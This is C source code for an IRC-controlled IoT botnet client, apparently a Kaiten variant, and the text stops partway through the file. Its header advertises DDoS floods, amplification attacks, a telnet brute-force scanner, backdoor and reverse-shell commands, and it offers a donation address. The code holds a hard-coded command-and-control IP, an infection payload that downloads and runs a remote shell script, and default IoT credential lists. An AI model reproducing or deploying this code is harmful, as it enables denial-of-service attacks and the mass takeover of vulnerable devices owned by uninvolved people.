Path: blob/master/Botnets/IRC/Capsaicin_iot.4f38d2.c
5038 views
/*******************************************************************************1* This is a remake of Kaiten, hacked together from various versions scattered *2* throughout cyberspace. New features include a variety of awesome shell one- *3* liners, ability to upgrade the knight over http (via gcc or static binary), *4* a feature called "HackPkg" that installs binaries without dependencies like *5* wget or tftp, and more! Tip: run GETBB <tftp ip> first to get the most out *6* of this bot (it will install to /var/bin, which is almost always writable). *7* The LOCKUP command will kill telnetd and run a backdoor of your choice (for *8* simplicity we assume you will run it on port 23). This bot is updated often,*9* so check back frequently for new killer features and ddos tools. In memory *10* of David Bowie, buse he was an awesome musician and passed during the *11* early development of this bot. By ShellzRuS and all the other developers *12* that have worked on Kaiten over the last 20 years. *13* *14* "Hacking on kaiten is a right of passage" --Kod *15*******************************************************************************16* This is a IRC based distributed denial of service client. It connects to *17* the server specified below and accepts commands via the channel specified. *18* The syntax is: *19* !<nick> <command> *20* You send this message to the channel that is defined later in this code. *21* Where <nick> is the nickname of the client (which can include wildcards) *22* and the command is the command that should be sent. For example, if you *23* want to tell all the clients with the nickname starting with N, to send you *24* the help message, you type in the channel: *25* *26* This variant is special. *27* It 16 DDoS methods in total!!! which include three amplification methods *28* DNS, NTP, and SNMP *29* It has a spoofed UDP flooder, 2 non-spoofed UDP flooders, a mulithreaded *30* spoofed TCP flooder (allows flags/attack method), vanilla TCP connection *31* flood, and non spoofed vanilla TCP random data flood. *32* Packets are made up of random bytes, between 0x00 - 0xFF. And random packet *33* size between 32 - 1024. It is extemely hard to block. *34* it also has blacknurse! :D *35* it also has 5 non root/non spoof attack methods in which ALL bots can run! *36* it has phatwonk, which I coded in about 15 minutes, based off of PAN. You *37* can set( any flag, such as syn, fin, psh, rst, xmas, usyn. Anything TCP *38* I have added the prometheus v4 telnet scanner which I have modified. *39* It now uses 18 default IoT device username and password combinations *40* it also uses the Mirai IP range generator to increase scanning speed. *41* The scanner now calls /bin/sh before sending the infection payload *42* the scanner starts a new fork() for each CPU core. (not by me) *43* And increases sockets according to how many CPUs exist. *44* the scanner also reports all cracked telnet credentials and successful *45* infections to the main command and control channel. *46* *47* Successes: *48* [TELNET] [+] CRACKED ---> 1.2.3.4:23 username:password *49* [TELNET] [+] INFECTED ---> 1.2.3.4:23 username:password *50* *51* *52* The scanner is started once connected to the server. *53* This way your bots only scan when they are connected, so *54* if your server is down, they wont scan. And it will appear as if your net *55* got killed but they will still attempt to connect to your server(s) *56* and start the scanner again if they are able to connect *57* *58* I have also added an advanced process name based botkiller. *59* The botkiller tries to find the bot, then kills it also, not to mention if *60* it exists on the HDD the bot that was killed gets deleted. *61* NO shell commands are required for the botkiller! *62* Also the botnet can detect 15 different architectures :) *63* All bot nicknames are PREFIX|ARCH|RANDID. Examples: *64* [BOT|MIPS]Jg6dug or [BOT|x86_64]kA79aLOi, etc. *65* Bot IDs are rand 4 - 8 alphanumeric charactars. *66* where PREFIX is what you specify, ARCH is the architecture. *67* RANDID is the bot suffix / ID. *68* !N* HELP *69* That will send you a list of all the commands. You can also specify an *70* astrick alone to make all client do a specific command: *71* !* SH uname -a *72* There are a large number of commands that can be sent to the client: *73* *74* Non-spoof / non-root attacks: (can run on all bots) *75* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *76* HOLD <host> <port> <time> = A vanilla TCP connection flooder *77* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *78* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder79* HTTP <url> <secs> = A HTTP(S) flooder *80* *81* Spoof / root attacks: *82* PAN <target> <port> <secs> = A SYN flooder *83* TCP <target> <port> <time> <flags/method> <packetsize> <pollinterval> <threads> = An advanced spoofed TCP flooder. Multithreading and xmas, usyn methods.84* UDP <target> <port> <secs> = An UDP flooder *85* PHATWONK <target> <flags/method> <secs> = A leet flooder coded by Freak, attacks 31 ports. Can set flags or attack method.86* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.87* Amplification attacks: *88* NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A DrDoS flooder using the NTP protocol89* DNS <IP> <port> <reflection file url> <threads> <time> = DNS DrDoS flooder90* SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = SNMP DrDoS flooder. Extremely fucking insane amp factor!!! (600 - 1700x)91* *92* Bot commands: *93* SCANNER <ON/OFF> = Toggles scanner. Started automatically. *94* DNS2IP <domain> = Get IP address from domain *95* RNDNICK = Randomizes knight nickname *96* NICK <nick> = Changes the nick of the client *97* SERVER <server> = Changes servers *98* GETSPOOFS = Gets the current spoofing *99* SPOOFS <subnet> = Changes spoofing to a subnet *100* DISABLE = Disables all packeting from the knight *101* ENABLE = Enables all packeting from the knight *102* KILL = Kills the knight *103* GET <http address> <save as> = Downloads a file off the web *104* VERSION = Requests version of knight *105* KILLALL = Kills all current packeting *106* HELP = Displays this *107* IRC <command> = Sends this command to the server *108* SH <command> = Executes a command *109* BASH <command> = Run a bash command *110* ISH <command> = Interactive SH (via privmsg) *111* SHD <command> = Daemonize command *112* UPDATE <http://server/bot> = Update this bot *113* HACKPKG <http://server/bin> = Install binary (no dependencies) *114* INSTALL <http://server/bin> = Install binary (via wget) *115* BINUPDATE <http://server/bin> = Update a binary (via wget) *116* SCAN <nmap opts> = Call an nmap wrapper script *117* GETSSH <http:serverdropbear> = Install dropbear, run on port 30022 *118* RSHELL <ip port> = Equates to nohup nc ip port *119* GETBB <tftp server> = Get a proper busybox (via tftp) *120* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *121* *122* Remember, all these commands must be prefixed by ! and the bot ID that you *123* want the command to be sent to (can include wildcards). *124* spaces in between the ! and the nickname, and there are no spaces before *125* the ! *126* *127* #NullzSec #kektheplanet *128* *129* - come on irc.anonplus.org - Leonidus, IrishSec, Milenko *130* *131* *NEW* Setup tutorial! https://pastebin.com/FXhvpn0D *132* *133* Kaiten variant coded by Freak aka Milenko aka whateverthefuckyouknowmeas *134* HACK THE PLANET *135* *136* Donate BTC so i has moar monies ^_^ THX *137* 1D7GMefDEoUdashTHXxC929Au3n896YLuw *138* *139* All code will be updated here. To contribute message me on Jabber / XMPP *140* Jabber/XMPP: [email protected] *141* Code was last updated on: Saturday, July 11th, 2017 *142* *143*******************************************************************************/144////////////////////////////////////////////////////////////////////////////////145// EDIT THESE //146////////////////////////////////////////////////////////////////////////////////147#undef STARTUP // Start on startup?148#undef IDENT // Only enable this if you absolutely have to149#define CHAN "#CSIS" // Channel to join150#define KEY "sewgfeg" // The key of the channel151#define PREFIX "KEK" // The NICK prefix152int numservers=1; // Must change this to equal number of servers down there153char *servers[] = { // List the servers in that format, always end in (void*)0154"104.238.148.120",155(void*)0156};157int nummasters = 1;158char *masters[] = { // *NEW* List of master nicks :)159"Freak"160};161// Telnet scanner payload, must end with \r\n\0162char *rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.148.120/update.sh; busybox wget http://104.238.148.120/update.sh; /bin/busybox wget http://104.238.148.120/update.sh; /usr/busybox wget http://104.238.148.120/update.sh; /var/run/busybox wget http://104.238.148.120/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh";163164////////////////////////////////////////////////////////////////////////////////165// STOP HERE! //166////////////////////////////////////////////////////////////////////////////////167#include <stdarg.h>168#include <errno.h>169#include <stdio.h>170#include <stdlib.h>171#include <string.h>172#include <fcntl.h>173#include <strings.h>174#include <unistd.h>175#include <dirent.h>176#include <poll.h>177#include <netdb.h>178#include <time.h>179#include <net/if.h>180#include <sys/wait.h>181#include <sys/time.h>182#include <sys/ioctl.h>183#include <arpa/inet.h>184#include <sys/socket.h>185#include <netinet/ip.h>186#include <netinet/in.h>187#include <netinet/tcp.h>188#include <netinet/udp.h>189#include <resolv.h>190//amp setting191#define MAX_PACKET_SIZE 1024192#define PHI 0x9e3779b9193//DNS amp194#define PACKETS_PER_RESOLVER 25195196//telnet scanner stuff197#define BUFFER_SIZE 1024198#define CMD_IAC 255199#define CMD_WILL 251200#define CMD_WONT 252201#define CMD_DO 253202#define CMD_DONT 254203204#define PAD_RIGHT 1205#define PAD_ZERO 2206#define PRINT_BUF_LEN 12207208#define OPT_SGA 3209#define SOCKBUF_SIZE 1024210211//lil tool212#define NUMITEMS(x) (sizeof(x) / sizeof((x)[0]))213214const char *knownBots[] = {215"mirai.*",216"dlr.*"217"mips",218"mips64",219"mipsel",220"sh2eb",221"sh2elf",222"sh4",223"x86",224"arm",225"armv5",226"armv4tl",227"armv4",228"armv6",229"i686",230"powerpc",231"powerpc440fp",232"i586",233"m68k",234"sparc",235"x86_64",236"jackmy*",237"hackmy*",238"b1",239"b2",240"b3",241"b4",242"b5",243"b6",244"b7",245"b8",246"b9",247"b10",248"b11",249"b12",250"b13",251"b14",252"b15",253"b16",254"b17",255"b18",256"b19",257"b20",258"busyboxterrorist",259"dvrHelper",260"kmy*",261"lol*",262"telmips",263"telmips64",264"telmipsel",265"telsh2eb",266"telsh2elf",267"telsh4",268"telx86",269"telarmv5",270"telarmv4tl",271"telarmv4",272"telarmv6",273"teli686",274"telpowerpc",275"telpowerpc440fp",276"teli586",277"telm68k",278"telsparc",279"telx86_64",280"TwoFace*",281"xxb*",282"bb",283"busybotnet",284"busybox",285"badbox",286"B1",287"B2",288"B3",289"B4",290"B5",291"B6",292"B7",293"B8",294"B9",295"B10",296"B11",297"B12",298"B13",299"B14",300"B15",301"B16",302"B17",303"B18",304"B20",305"gaybot",306"hackz",307"bin*",308"gtop",309"botnet",310"swatnet",311"ballpit",312"fucknet",313"cracknet",314"weednet",315"gaynet",316"queernet",317"ballnet",318"unet",319"yougay",320"sttftp",321"sstftp",322"sbtftp",323"btftp",324"y0u1sg3y",325"bruv*",326"IoT*"327};328329char *UserAgents[] = {330"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",331"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",332"Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",333"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",334"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",335"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",336"Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",337"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",338"Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",339"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",340"Mozilla/5.0 (PLAYSTATION 3; 3.55)",341"Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",342"wii libnup/1.0",343"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",344"PSP (PlayStation Portable); 2.00",345"Bunjalloo/0.7.6(Nintendo DS;U;en)",346"Doris/1.15 [en] (Symbian)",347"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",348"BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",349"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",350"Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",351"Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",352"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",353"Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",354"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",355"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",356"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",357"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",358"SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",359"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",360"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",361"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",362"MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",363"Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",364"Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",365"MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"366};367368369370371char *usernames[] = {372"root\0",373"root\0",374"root\0",375"root\0",376"root\0",377"root\0",378"root\0",379"root\0",380"root\0",381"root\0",382"root\0",383"root\0",384"root\0",385"root\0",386"root\0",387"root\0",388"root\0",389"root\0",390"root\0",391"root\0",392"root\0",393"root\0",394"root\0",395"root\0",396"root\0",397"root\0",398"root\0",399"root\0",400"admin\0",401"admin\0",402"admin\0",403"admin\0",404"admin\0",405"admin\0",406"admin\0",407"admin\0",408"admin\0",409"admin\0",410"admin\0",411"admin\0",412"admin\0",413"admin\0",414"admin\0",415"admin\0",416"admin\0",417"admin\0",418"admin\0",419"admin\0",420"admin\0",421"guest\0",422"guest\0",423"guest\0",424"guest\0",425"guest\0",426"guest\0",427"guest\0",428"root\0",429"admin\0",430"root\0",431"default\0",432"user\0",433"guest\0",434"daemon\0",435"admin\0",436"admin\0",437"root\0",438"admin\0",439"adm\0",440"guest\0",441"root\0",442"root\0",443"telnet\0",444"root\0",445"admin\0",446"admin\0",447"Administrator\0",448"root\0",449"mg3500\0",450"admin\0",451"admin\0",452"admin\0",453"admin\0",454"admin\0",455"admin\0",456"default\0",457"admin\0",458"admin\0",459"admin\0",460"root\0",461"root\0",462"root\0",463"root\0",464"admin1\0",465"ubnt\0",466"support\0",467"root\0",468"user\0",469"\0",470"root\0",471"guest\0"472};473474char *passwords[] = {475"000000\0",476"14567\0",477"hi3518\0",478"user\0",479"pass\0",480"admin14\0",481"7ujMko0admin\0",482"00000000\0",483"<>\0",484"klv1\0",485"klv14\0",486"oelinux1\0",487"realtek\0",488"1111\0",489"54321\0",490"antslq\0",491"zte9x15\0",492"system\0",493"root\0",494"1456\0",495"888888\0",496"ikwb\0",497"password\0",498"default\0",499"juantech\0",500"Zte521\0",501"\0",502"xc3511\0",503"support\0",504"1111111\0",505"service\0",506"145\0",507"4321\0",508"tech\0",509"<>\0",510"abc1\0",511"7ujMko0admin\0",512"switch\0",513"admin14\0",514"\0",515"1111\0",516"meinsm\0",517"pass\0",518"smcadmin\0",519"14567890\0",520"14\0",521"admin1\0",522"password\0",523"admin\0",524"Zte521\0",525"anko\0",526"xc3511\0",527"1456\0",528"\0",529"guest\0",530"145\0",531"xc3511\0",532"admin\0",533"Zte521\0",534"\0",535"user\0",536"guest\0",537"\0",538"password\0",539"admin1\0",540"ikwb\0",541"14567890\0",542"\0",543"\0",544"1456\0",545"root\0",546"telnet\0",547"zte9x15\0",548"meinsm\0",549"\0",550"\0",551"antslq\0",552"merlin\0",553"switch\0",554"7ujMko0admin\0",555"abc1\0",556"<>\0",557"tech\0",558"4321\0",559"default\0",560"145\0",561"service\0",562"1111111\0",563"admin14\0",564"pass\0",565"user\0",566"hi3518\0",567"password\0",568"ubnt\0",569"zlxx.\0",570"14567\0",571"\0",572"\0",573"000000\0",574"Zte521\0"575};576577578int scanPid = 0;579580char *advances[] = {":", "ser", "ogin", "name", "pass", "dvrdvs", (char*)0};581char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "error", "goodbye", "bad", "timeout", (char*)0};582char *tmpdirs[] = {"/tmp/", "/var/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", (char*) 0};583char *successes[] = {"$", "#", ">", "shell", "dvrdvs", "usybox", (char*)0};584char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};585char *shellz[] = {"shell", "sh", "/bin/sh", "dash", (char*)0};586587struct ipstate_t588{589int fd;590unsigned int ip;591unsigned char state;592unsigned char complete;593unsigned char usernameInd;594unsigned char passwordInd;595unsigned char tempDirInd;596unsigned int totalTimeout;597unsigned short bufUsed;598unsigned int telPort;599char *sockbuf;600};601602int sock,changeservers=0;603int *pids, actualparent;604char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256], dispass[256];605606//unsigned int *pids;607unsigned long spoofs=0, spoofsm=0, numpids=0;608609char *getBuild() { //Get current architecture, detectx nearly every architecture. Coded by Freak610#if defined(__x86_64__) || defined(_M_X64)611return "x86_64";612#elif defined(i386) || defined(__i386__) || defined(__i386) || defined(_M_IX86)613return "x86_32";614#elif defined(__ARM_ARCH_2__)615return "ARM2";616#elif defined(__ARM_ARCH_3__) || defined(__ARM_ARCH_3M__)617return "ARM3";618#elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)619return "ARM4T";620#elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)621return "ARM5"622#elif defined(__ARM_ARCH_6T2_) || defined(__ARM_ARCH_6T2_)623return "ARM6T2";624#elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6Z__) || defined(__ARM_ARCH_6ZK__)625return "ARM6";626#elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) || defined(__ARM_ARCH_7S__)627return "ARM7";628#elif defined(__aarch64__)629return "ARM64";630#elif defined(mips) || defined(__mips__) || defined(__mips)631return "MIPS";632#elif defined(__sh__)633return "SUPERH";634#elif defined(__powerpc) || defined(__powerpc__) || defined(__powerpc64__) || defined(__POWERPC__) || defined(__ppc__) || defined(__ppc64__) || defined(__PPC__) || defined(__PPC64__) || defined(_ARCH_PPC) || defined(_ARCH_PPC64)635return "POWERPC";636#elif defined(__sparc__) || defined(__sparc)637return "SPARC";638#elif defined(__m68k__)639return "M68K";640#else641return "UNKNOWN";642#endif643}644static struct hostent *fake_hostent(const char *hostname, struct in_addr addr,645struct hostent *result, char *buf,646int bufsize, int *errval);647static struct hostent *file_find_name(const char *name, struct hostent *result,648char *buf, int bufsize, int *errval);649650struct hostent *gethostbyname(const char *hostname)651{652struct res_data *data = _res_init();653654if (!data)655return NULL;656if (!data->buf) {657data->buf = malloc(sizeof(struct hostent) + HOST_BUFSIZE);658if (!data->buf) {659errno = 0;660data->errval = NO_RECOVERY;661return NULL;662}663}664return gethostbyname_r(hostname, (struct hostent *) data->buf,665data->buf + sizeof(struct hostent), HOST_BUFSIZE,666&data->errval);667}668669struct hostent *gethostbyname_r(const char *hostname, struct hostent *result,670char *buf, int bufsize, int *errval)671{672struct in_addr addr;673querybuf qbuf;674const char *p;675int n;676677/* Default failure condition is not a range error and not recoverable. */678errno = 0;679*errval = NO_RECOVERY;680681/* Check for all-numeric hostname with no trailing dot. */682if (isdigit(hostname[0])) {683p = hostname;684while (*p && (isdigit(*p) || *p == '.'))685p++;686if (!*p && p[-1] != '.') {687/* Looks like an IP address; convert it. */688if (inet_aton(hostname, &addr) == -1) {689*errval = HOST_NOT_FOUND;690return NULL;691}692return fake_hostent(hostname, addr, result, buf, bufsize, errval);693}694}695696/* Do the search. */697n = res_search(hostname, C_IN, T_A, qbuf.buf, sizeof(qbuf));698if (n >= 0)699return _res_parse_answer(&qbuf, n, 0, result, buf, bufsize, errval);700else if (errno == ECONNREFUSED)701return file_find_name(hostname, result, buf, bufsize, errval);702else703return NULL;704}705706static struct hostent *fake_hostent(const char *hostname, struct in_addr addr,707struct hostent *result, char *buf,708int bufsize, int *errval)709{710int len = strlen(hostname);711char *name, *addr_ptr;712713if (SP(SP(SP(buf, char, len + 1), addr, 1), char *, 3) > buf + bufsize) {714errno = ERANGE;715return NULL;716}717718/* Copy faked name and address into buffer. */719strcpy(buf, hostname);720name = buf;721buf = ALIGN(buf + len + 1, addr);722*((struct in_addr *) buf) = addr;723addr_ptr = buf;724buf = ALIGN(buf + sizeof(addr), char *);725((char **) buf)[0] = addr_ptr;726((char **) buf)[1] = NULL;727((char **) buf)[2] = NULL;728729result->h_name = name;730result->h_aliases = ((char **) buf) + 2;731result->h_addrtype = AF_INET;732result->h_length = sizeof(addr);733result->h_addr_list = (char **) buf;734735return result;736}737738static struct hostent *file_find_name(const char *name, struct hostent *result,739char *buf, int bufsize, int *errval)740{741char **alias;742FILE *fp = NULL;743744sethostent(0);745while ((result = gethostent_r(result, buf, bufsize, errval)) != NULL) {746/* Check the entry's name and aliases against the given name. */747if (strcasecmp(result->h_name, name) == 0)748break;749for (alias = result->h_aliases; *alias; alias++) {750if (strcasecmp(*alias, name) == 0)751break;752}753}754if (!result && errno != ERANGE)755*errval = HOST_NOT_FOUND;756return result;757}758759u_char rseed[4096];760int rsi, rnd, pid;761762// Calculates the checksum of the ip header.763unsigned short csum(unsigned short *ptr,int nbytes) {764register long sum;765unsigned short oddbyte;766register short answer;767768sum=0;769while(nbytes>1) {770sum+=*ptr++;771nbytes-=2;772}773if(nbytes==1) {774oddbyte=0;775*((u_char*)&oddbyte)=*(u_char*)ptr;776sum+=oddbyte;777}778779sum = (sum>>16)+(sum & 0xffff);780sum = sum + (sum>>16);781answer=(short)~sum;782return(answer);783}784785int strwildmatch(const char* pattern, const char* string) {786switch(*pattern) {787case '\0': return *string;788case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));789case '?': return !(*string && !strwildmatch(pattern+1, string+1));790default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));791}792}793794int Send(int sock, char *words, ...) {795static char textBuffer[1024];796va_list args;797va_start(args, words);798vsprintf(textBuffer, words, args);799va_end(args);800return write(sock,textBuffer,strlen(textBuffer));801}802803int mfork(char *sender) {804unsigned int parent, *newpids, i;805if(disabled == 1) {806Send(sock, "NOTICE %s :Unable to comply.\n", sender);807return 1;808}809parent=fork();810if(parent <= 0) return parent;811numpids++;812newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));813for (i=0;i<numpids-1;i++) newpids[i]=pids[i];814newpids[numpids-1]=parent;815free(pids);816pids=newpids;817return parent;818}819820unsigned long getspoof() {821if(!spoofs) return rand();822if(spoofsm == 1) return ntohl(spoofs);823return ntohl(spoofs+(rand() % spoofsm)+1);824}825826void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }827828char *randstring(int length) {829srand(time(NULL));830char *charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";831size_t stringLen = 26*2+10;832char *randomString;833834randomString = malloc(sizeof(char) * (length +1));835836if(!randomString) {837return (char*)0;838}839840unsigned int key = 0;841842int n;843844for (n = 0;n < length;n++) {845key = rand() % stringLen;846randomString[n] = charset[key];847}848849randomString[length] = '\0';850851return randomString;852}853854void identd() {855int sockname,sockfd,sin_size,tmpsock,i;856struct sockaddr_in my_addr,their_addr;857char szBuffer[1024];858if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;859my_addr.sin_family = AF_INET;860my_addr.sin_port = htons(113);861my_addr.sin_addr.s_addr = INADDR_ANY;862memset(&(my_addr.sin_zero), 0, 8);863if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;864if(listen(sockfd, 1) == -1) return;865if(fork() == 0) return;866sin_size = sizeof(struct sockaddr_in);867if((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);868for(;;) {869fd_set bla;870struct timeval timee;871FD_ZERO(&bla);872FD_SET(tmpsock,&bla);873timee.tv_sec=timee.tv_usec=60;874if(select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);875if(FD_ISSET(tmpsock,&bla)) break;876}877i = recv(tmpsock,szBuffer,1024,0);878if(i <= 0 || i >= 20) exit(0);879szBuffer[i]=0;880if(szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;881if(szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;882Send(tmpsock, "%s : USERID : UNIX : %s\n",szBuffer,ident);883close(tmpsock);884close(sockfd);885exit(0);886}887888long poww(long a, long b) {889if(b == 0) return 1;890if(b == 1) return a;891return a*poww(a,b-1);892}893894u_short in_cksum(u_short *addr, int len) {895register int nleft = len;896register u_short *w = addr;897register int sum = 0;898u_short answer =0;899while(nleft > 1) {900sum += *w++;901nleft -= 2;902}903if(nleft == 1) {904*(u_char *)(&answer) = *(u_char *)w;905sum += answer;906}907sum = (sum >> 16) + (sum & 0xffff);908sum += (sum >> 16);909answer = ~sum;910return(answer);911}912913void get(int sock, char *sender, int argc, char **argv) {914int sock2,i,d;915struct sockaddr_in server;916unsigned long ipaddr;917char buf[1024];918FILE *file;919unsigned char bufm[4096];920if(mfork(sender) != 0) return;921if(argc < 2) {922Send(sock, "NOTICE %s :GET <host> <save as>\n", sender);923exit(0);924}925if((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {926Send(sock, "NOTICE %s :Unable to create socket.\n", sender);927exit(0);928}929if(!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);930else strcpy(buf,argv[1]);931for (i=0;i<strlen(buf) && buf[i] != '/';i++);932buf[i]=0;933server.sin_family = AF_INET;934server.sin_port = htons(80);935if((ipaddr = inet_addr(buf)) == -1) {936struct hostent *hostm;937if((hostm=gethostbyname(buf)) == NULL) {938Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);939exit(0);940}941memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);942}943else server.sin_addr.s_addr = ipaddr;944memset(&(server.sin_zero), 0, 8);945if(connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {946Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);947exit(0);948}949950Send(sock2,"GET /%s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);951Send(sock, "NOTICE %s :Receiving file.\n", sender);952file=fopen(argv[2],"wb");953while(1) {954int i;955if((i=recv(sock2,bufm,4096,0)) <= 0) break;956if(i < 4096) bufm[i]=0;957for (d=0;d<i;d++) if(!strncmp(bufm+d,"\r\n\r\n",4)) {958for (d+=4;d<i;d++) fputc(bufm[d],file);959goto done;960}961}962done:963Send(sock, "NOTICE %s :Saved as %s\n", sender,argv[2]);964while(1) {965int i,d;966if((i=recv(sock2,bufm,4096,0)) <= 0) break;967if(i < 4096) bufm[i]=0;968for (d=0;d<i;d++) fputc(bufm[d],file);969}970fclose(file);971close(sock2);972exit(0);973}974975void getspoofs(int sock, char *sender, int argc, char **argv) {976unsigned long a=spoofs,b=spoofs+(spoofsm-1);977if(spoofsm == 1) Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);978else Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);979}980981void version(int sock, char *sender, int argc, char **argv) {982Send(sock, "NOTICE %s :Kaiten Ziggy Qbot Redo by Milenko version 14.0.0\n", sender);983}984985void nickc(int sock, char *sender, int argc, char **argv) {986if(argc != 1) {987Send(sock, "NOTICE %s :NICK <nick>\n", sender);988return;989}990if(strlen(argv[1]) >= 33) {991Send(sock, "NOTICE %s :Nick cannot be larger than 32 characters.\n", sender);992return;993}994nick = argv[1];995Send(sock, "NICK %s\n",argv[1]);996}997998int realrand(int low, int high) {999srand(time(NULL) + getpid());1000return (rand() % (high + 1 - low) + low);1001}10021003void rndnick(int sock, char *sender, int argc, char **argv) {1004nick = randstring(realrand(4, 8));1005Send(sock, "NICK [%s|%s]%s\n", PREFIX, getBuild(), nick);1006}10071008void disable(int sock, char *sender, int argc, char **argv) {1009if(argc != 1) {1010Send(sock, "NOTICE %s :DISABLE <pass>\n", 